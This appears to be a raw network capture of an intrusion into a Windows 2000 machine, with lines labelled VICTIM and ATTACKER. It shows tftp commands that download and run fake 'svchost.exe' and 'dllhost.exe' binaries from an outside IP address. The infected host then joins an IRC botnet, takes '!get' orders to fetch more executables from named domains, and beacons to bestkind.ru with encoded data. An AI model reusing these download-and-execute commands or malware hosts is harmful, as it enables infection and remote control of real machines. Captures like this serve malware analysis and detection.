VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp.
VICTIM: C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label.
VICTIM: Volume Serial Number is F07B-A028
VICTIM: Directory of C:\\WINNT\\system32\\wins
VICTIM: File Not Found
VICTIM: C:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label.
VICTIM: Volume Serial Number is F07B-A028
VICTIM: Directory of C:\\WINNT\\system32\\dllcache
VICTIM: File Not Found
VICTIM: C:\\WINNT\\system32>
VICTIM: tftp -i 175.112.215.180 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: Transfer successful: 35088 bytes in 12 seconds, 2924 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: tftp -i 175.112.215.180 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: Transfer successful: 25600 bytes in 9 seconds, 2844 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK aiyxhpod
VICTIM: USER s020500 . . :-
VICTIM: Service Pack 2
VICTIM: JOIN &virtu
ATTACKER: :u. PRIVMSG aiyxhpod :!get http:/ad.ghura.pl/rc.exe
ATTACKER: :u. PRIVMSG aiyxhpod :!get http:/www.derquda.com/kb8.txt
VICTIM: GET /rc.exe HTTP/1.0
VICTIM: User-Agent: Download
VICTIM: Host: ad.ghura.pl
VICTIM: Pragma: no-cache
ATTACKER: GET /kb8.txt HTTP/1.0
ATTACKER: User-Agent: Download
ATTACKER: Host: www.derquda.com
ATTACKER: Pragma: no-cache
ATTACKER: GET /ert/nop4.txt HTTP/1.0
ATTACKER: User-Agent: Microsoft Internet Explorer
ATTACKER: Host: www.derquda.com
ATTACKER: Pragma: no-cache
ATTACKER: GET /ert/mno3.txt HTTP/1.0
ATTACKER: User-Agent: Microsoft Internet Explorer
ATTACKER: Host: www.derquda.com
ATTACKER: Pragma: no-cache
ATTACKER: GET /ert/lmn2.txt HTTP/1.0
ATTACKER: User-Agent: Microsoft Internet Explorer
ATTACKER: Host: www.derquda.com
ATTACKER: Pragma: no-cache
ATTACKER: GET /ert/klm1.txt HTTP/1.0
ATTACKER: User-Agent: Microsoft Internet Explorer
ATTACKER: Host: www.derquda.com
ATTACKER: Pragma: no-cache
ATTACKER: GET /list.php?c=DDC5C512B5035DF1AA4DE6CEFCB9D001C0599EA5290B87101D2A410051F619218DB3BAA7C6B15C3221582BB13075280ADD27D423DFA65E0FB1C5&v=2&t=0.8541986 HTTP/1.0
ATTACKER: User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER: Host: bestkind.ru
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /upload/int.exe?t=5.303591E-02 HTTP/1.0
ATTACKER: User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER: Host: anotherdomainname.in
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /sn.php?c=ACB25ABEFF6F36E28B934E61B0FDBF7865FDA8933062D41DA0C2C1B5C31BC097347C46ABB4F5AD826A5DE9853C3302ECE32D56B1A6CBEFBFDDEC6913B1CB45DBB2CE9EED36E78C13A19BC9B30AE44F90D126073A2658BBBD9331F49905ED681CE8BE1E144E5577DB43F0BA3DB3B3DD47906796B9195EFED9742D4F20F94F7EC0D7D1C462062B549CA098CA9C10D720A3&t=0.869198 HTTP/1.0
ATTACKER: User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER: Host: bestkind.ru
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /sn.php?c=ECF233D76BFBD206DCC4AB846924E027D94182B9BEEC965FD6B46D19964E80D70149719C3372E8C7497E573B909FF01E1ED05ABD4429DD8D78492258A8D2B6281A66F6853CED0E9118222D5747A91EC19760E5D8BEC01711D476F895678FB5C167312C263E2518B4C97AAA3C18E1D05815E0B2EC86D536070B1F8CF9FC5E03F95A4AC26B33061BA41F2B8CD9CB0AAA2E&t=0.6767084 HTTP/1.0
ATTACKER: User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
ATTACKER: Host: bestkind.ru
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
VICTIM: \001\000\000\000EFv5
VICTIM: \025\310\3741\225 ?\031S\272{\274M\272\353\322,+v\220#|\321\216\315>[\025\310\3741\226 ?\031Q\272|\274A\272\331\3230(\352\274E\272v\274\025\310\3741\224 ?\031Q\272~\274A\272\351\3316-\337\323+\272\313\2053\357\025\310\3741\227 ?\031Q\272}\274A\272\354\331+\036\345\316E\275v\274E\025\310\3741\226 ?\031W\272~\274G\272\342\3307.\357\314 \272w\274\025\310\3741\227 ?\031Q\272}\274A\272\342\33070\333\316E\036v\274E\025\310\3741\246 ?\031\\\272}\274V\272\355\325+0\333\316E\277v\274E\272v\274EM~\274E\274v\274E\272v\275\027\337\3607\206 ?\031
ATTACKER: PING :k.
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PING :k.
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PING :k.
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu